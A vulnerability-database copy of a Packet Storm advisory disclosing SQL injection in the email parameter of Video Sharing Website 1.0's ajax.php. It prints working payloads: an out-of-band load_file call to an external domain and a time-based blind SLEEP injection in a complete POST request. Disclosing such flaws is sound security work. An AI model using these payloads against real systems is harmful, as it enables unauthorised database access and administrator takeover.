Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:165368
HistoryDec 20, 2021 - 12:00 a.m.

Video Sharing Website 1.0 SQL Injection

2021-12-2000:00:00
nu11secur1ty
packetstormsecurity.com
199
JSON
`## Title: Video Sharing Website 1.0 SQL - Injection  
## Author: nu11secur1ty  
## Date: 12.18.2021  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html  
  
## Description:  
The `email` parameter from `ajax.php` app of Video Sharing Website 1.0  
appears to be vulnerable to SQL injection attacks. The payload  
'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'  
was submitted in the email parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed. The attacker can take administrator  
account controll on this system.  
Status: CRITICAL  
  
[+] Payload:  
  
```mysql  
---  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: [email protected]'+(select  
load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+''  
AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND  
'yreq'='yreq&password=jsmith123  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)  
  
## Proof and Exploit:  
[href](https://streamable.com/4x2rfk)  
  
`
JSON